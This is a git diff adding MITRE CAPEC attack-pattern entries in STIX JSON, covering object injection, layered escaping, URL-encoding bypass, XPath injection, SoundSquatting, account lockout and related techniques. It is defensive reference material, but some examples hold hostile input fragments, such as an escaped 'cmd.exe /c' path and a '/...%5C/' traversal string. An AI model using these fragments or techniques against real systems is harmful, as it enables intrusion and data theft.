"external_id": "CWE-326" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html", + "external_id": "CWE-327" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html", + "external_id": "CWE-693" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/719.html", + "external_id": "CWE-719" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_example_instances": [ + "In 1997 the original DES challenge used distributed net computing to brute force the encryption key and decrypt the ciphertext to obtain the original plaintext. Each machine was given its own section of the key space to cover. The ciphertext was decrypted in 96 days." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Ciphertext is known.", + "Encryption algorithm and key size are known." + ], + "x_capec_resources_required": [ + "\n A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge).\n On average, for a binary key of size N, 2^(N/2) trials will be needed to find the key that would decrypt the ciphertext to obtain the original plaintext.\n Obviously as N gets large the brute force approach becomes infeasible.\n " + ], + "x_capec_skills_required": { + "Low": "Brute forcing encryption does not require much skill." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cc5ec028-8dd8-4bea-b43e-4a31a64c3cb1.json b/capec/attack-pattern/attack-pattern--cc5ec028-8dd8-4bea-b43e-4a31a64c3cb1.json new file mode 100644 index 0000000000..6806654cdb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cc5ec028-8dd8-4bea-b43e-4a31a64c3cb1.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--e8176a4b-59ab-4757-9d47-100ca3ee0db4", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cc5ec028-8dd8-4bea-b43e-4a31a64c3cb1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-02-06T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Object Injection", + "description": "An adversary attempts to exploit an application by injecting additional, malicious content during its processing of serialized objects. Developers leverage serialization in order to convert data or state into a static, binary format for saving to disk or transferring over a network. These objects are then deserialized when needed to recover the data/state. By injecting a malformed object into a vulnerable application, an adversary can potentially compromise the application by manipulating the deserialization process. This can result in a number of unwanted outcomes, including remote code execution.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/586.html", + "external_id": "CAPEC-586" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/502.html", + "external_id": "CWE-502" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Deserialization of Untrusted Data, 2017--01, OWASP", + "external_id": "REF-468" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands (Functions that assume information in the deserialized object is valid could be exploited.)" + ], + "Availability": [ + "Resource Consumption (If a function is making an assumption on when to terminate, based on a sentry in a string, it could easily never terminate and exhaust available resources.)" + ], + "Integrity": [ + "Modify Data (Attackers can modify objects or data that was assumed to be safe from modification.)" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target application must unserialize data before validation." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a.json b/capec/attack-pattern/attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a.json new file mode 100644 index 0000000000..310919dae3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a.json @@ -0,0 +1,116 @@ +{ + "type": "bundle", + "id": "bundle--d6c415b6-be95-45ad-b08e-990614a13430", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cd11d31a-89f2-47d8-862f-aed22baed21a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Exploiting Multiple Input Interpretation Layers", + "description": "An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a \"layer\" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: --> --> . In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/43.html", + "external_id": "CAPEC-43" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html", + "external_id": "CWE-179" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html", + "external_id": "CWE-183" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/77.html", + "external_id": "CWE-77" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html", + "external_id": "CWE-78" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Using Escapes\n The backslash character provides a good example of the multiple-parser issue. A backslash is used to escape characters in strings, but is also used to delimit directories on the NT file system. When performing a command injection that includes NT paths, there is usually a need to \"double escape\" the backslash. In some cases, a quadruple escape is necessary.\n Original String: C:\\\\\\\\winnt\\\\\\\\system32\\\\\\\\cmd.exe /c\n \n Interim String: C:\\\\winnt\\\\system32\\\\cmd.exe /c\n \n Final String: C:\\winnt\\system32\\cmd.exe /c\n This diagram shows each successive layer of parsing translating the backslash character. A double backslash becomes a single as it is parsed. By using quadruple backslashes, the attacker is able to control the result in the final string.\n [R.43.1][REF-2]\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "User input is used to construct a command to be executed on the target system or as part of the file name.", + "Multiple parser passes are performed on the data supplied by the user." + ], + "x_capec_skills_required": { + "Medium": "Knowledge of various escaping schemes, such as URL escape encoding and XML escape characters." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cd191cc2-fa51-4adc-b1c6-c685e8be1653.json b/capec/attack-pattern/attack-pattern--cd191cc2-fa51-4adc-b1c6-c685e8be1653.json new file mode 100644 index 0000000000..bd5757a4f6 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cd191cc2-fa51-4adc-b1c6-c685e8be1653.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--7de07ac9-dc4c-4f8b-a391-5f29a9ccfe27", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cd191cc2-fa51-4adc-b1c6-c685e8be1653", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Protocol Analysis", + "description": "An adversary engages in activities to decipher and/or decode protocol information for a network or application communication protocol used for transmitting information between interconnected nodes or systems on a packet-switched data network. While this type of analysis involves the analysis of a networking protocol inherently, it does not require the presence of an actual or physical network. Although certain techniques for protocol analysis benefit from manipulating live 'on-the-wire' interactions between communicating components, static or dynamic analysis techniques applied to executables as well as to device drivers, such as network interface drivers, can also be used to reveal the function and characteristics of a communication protocol implementation. Depending upon the methods used the process may involve observing, interacting, and modifying actual communications occurring between hosts. The goal of protocol analysis is to derive the data transmission syntax, as well as to extract the meaningful content, including packet or content delimiters used by the protocol. This type of analysis is often performed on closed-specification protocols, or proprietary protocols, but is also useful for analyzing publicly available specifications to determine how particular implementations deviate from published specifications.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/192.html", + "external_id": "CAPEC-192" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/326.html", + "external_id": "CWE-326" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Proprietary_protocol", + "external_id": "REF-57" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "url": "http://en.wikipedia.org/wiki/Reverse_engineering", + "external_id": "REF-50" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Successful deciphering of protocol information compromises the confidentiality of future sensitive communications.)" + ], + "Integrity": [ + "Modify Data (Modifying communications after successful deciphering of protocol information compromises integrity.)" + ] + }, + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to a binary executable.", + "The ability to observe and interact with a communication channel between communicating processes." + ], + "x_capec_resources_required": [ + "Depending on the type of analysis, a variety of tools might be required, such as static code and/or dynamic analysis tools. Alternatively, the effort might require debugging programs such as ollydbg, SoftICE, or disassemblers like IDA Pro. In some instances, packet sniffing or packet analyzing programs such as TCP dump or Wireshark are necessary. Lastly, specific protocol analysis might require tools such as PDB (Protocol Debug), or packet injection tools like pcap or Nemesis." + ], + "x_capec_skills_required": { + "High": "Knowlegde of the Open Systems Interconnection model (OSI model), and famililarity with Wireshark or some other packet analyzer." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf.json b/capec/attack-pattern/attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf.json new file mode 100644 index 0000000000..a171fa996a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--740c4ed4-d2d0-45a5-8d0a-3b3f9bc1d0e2", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ce52b42b-d355-43fb-92f9-ce114cd3cfdf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "SoundSquatting", + "description": "An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user's confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/631.html", + "external_id": "CAPEC-631" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Nick Nikiforakis, Marco Balduzzi, Lieven Desmet, Frank Piessens, Wouter Joosen, Soundsquatting: Uncovering the Use of Homophones in Domain Squatting, Trend Micro", + "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-soundsquatting.pdf", + "external_id": "REF-491" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "Homophone Attack" + ], + "x_capec_consequences": { + "Other": [ + "Other (Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials.)" + ] + }, + "x_capec_example_instances": [ + "\n An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.\n However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.\n The user is directed to the adversary's website, which appears as if it is the legitimate guaranteebanking.com login page.\n The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user's legitimate guaranteebanking.com credentials to log into the user's account and steal any money which may be in the account.See also: SoundSquatting vulnerability allows an adversary to impersonate a trusted domain and leverages a user's confusion between the meaning of two words which are pronounced the same into visiting the malicious website to steal user credentials." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets." + ], + "x_capec_skills_required": { + "Low": "Adversaries must be able to register DNS hostnames/URL\u2019s." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ce67b345-712f-4516-bb1a-555688650caa.json b/capec/attack-pattern/attack-pattern--ce67b345-712f-4516-bb1a-555688650caa.json new file mode 100644 index 0000000000..9ecf45b33f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ce67b345-712f-4516-bb1a-555688650caa.json @@ -0,0 +1,158 @@ +{ + "type": "bundle", + "id": "bundle--e690a43c-1ee9-4461-b641-944cdad5178a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ce67b345-712f-4516-bb1a-555688650caa", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html", + "external_id": "CAPEC-64" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html", + "external_id": "CWE-177" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html", + "external_id": "CWE-22" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html", + "external_id": "REF-495" + }, + { + "source_name": "reference_from_CAPEC", + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "url": "http://www.ietf.org/rfc/rfc3986.txt", + "external_id": "REF-496" + }, + { + "source_name": "reference_from_CAPEC", + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "url": "http://www.ietf.org/rfc/rfc1738.txt", + "external_id": "REF-497" + }, + { + "source_name": "reference_from_CAPEC", + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp", + "external_id": "REF-498" + }, + { + "source_name": "reference_from_CAPEC", + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "url": "http://www.albionresearch.com/misc/urlencode.php", + "external_id": "REF-499" + }, + { + "source_name": "reference_from_CAPEC", + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS", + "external_id": "REF-500" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cf09aaa1-441a-4f10-93ce-aea498f9b75a.json b/capec/attack-pattern/attack-pattern--cf09aaa1-441a-4f10-93ce-aea498f9b75a.json new file mode 100644 index 0000000000..6e98761ecf --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cf09aaa1-441a-4f10-93ce-aea498f9b75a.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--7e842ca0-af42-4298-8081-7c52b485586f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cf09aaa1-441a-4f10-93ce-aea498f9b75a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Intent Spoof", + "description": "An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component blindly trusts the intent's action, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/502.html", + "external_id": "CAPEC-502" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf", + "external_id": "REF-427" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application will be used to issue spoofed intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a.json b/capec/attack-pattern/attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a.json new file mode 100644 index 0000000000..a0b67f36bb --- /dev/null +++ b/capec/attack-pattern/attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a.json @@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--f4181e40-41bc-41e0-a40d-f5c887cde4ad", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--cf470563-971d-489e-a0cc-07ef4a7c9e8a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Inducing Account Lockout", + "description": "An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/2.html", + "external_id": "CAPEC-2" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/645.html", + "external_id": "CWE-645" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_example_instances": [ + "A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder's account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system has a lockout mechanism.", + "An attacker must be able to reproduce behavior that would result in an account being locked." + ], + "x_capec_resources_required": [ + "Computer with access to the login portion of the target system" + ], + "x_capec_skills_required": { + "Low": "No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8.json b/capec/attack-pattern/attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8.json new file mode 100644 index 0000000000..c7efc20c73 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8.json @@ -0,0 +1,81 @@ +{ + "type": "bundle", + "id": "bundle--246a02fa-3329-4329-a416-72cf4a8f3cee", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d01b1014-6dd4-42b3-92c4-ec82745071e8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "XPath Injection", + "description": "An attacker can craft special user-controllable input consisting of XPath expressions to inject the XML database and bypass authentication or glean information that he normally would not be able to. XPath Injection enables an attacker to talk directly to the XML database, thus bypassing the application completely. XPath Injection results from the failure of an application to properly sanitize input used as part of dynamic XPath expressions used to query an XML database.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/83.html", + "external_id": "CAPEC-83" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/91.html", + "external_id": "CWE-91" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ] + }, + "x_capec_example_instances": [ + "Consider an application that uses an XML database to authenticate its users. The application retrieves the user name and password from a request and forms an XPath expression to query the database. An attacker can successfully bypass authentication and login without valid credentials through XPath Injection. This can be achieved by injecting the query to the XML database with XPath syntax that causes the authentication check to fail. Improper validation of user-controllable input and use of a non-parameterized XPath expression enable the attacker to inject an XPath expression that causes authentication bypass." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "XPath queries used to retrieve information stored in XML documents", + "User-controllable input not properly sanitized before being used as part of XPath queries" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "XPath Injection shares the same basic premises with SQL Injection. An attacker must have knowledge of XPath syntax and constructs in order to successfully leverage XPath Injection" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--d07d20eb-71c3-4416-bbaf-4a63c55230d8.json b/capec/attack-pattern/attack-pattern--d07d20eb-71c3-4416-bbaf-4a63c55230d8.json new file mode 100644 index 0000000000..ec6f997ea7 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--d07d20eb-71c3-4416-bbaf-4a63c55230d8.json @@ -0,0 +1,41 @@ +{ + "type": "bundle", + "id": "bundle--0ee008b9-6d28-4d1b-94b2-8dc971b9ff31", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--d07d20eb-71c3-4416-bbaf-4a63c55230d8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Create Malicious Client", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures. For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality. For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html", + "external_id": "CAPEC-202" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No 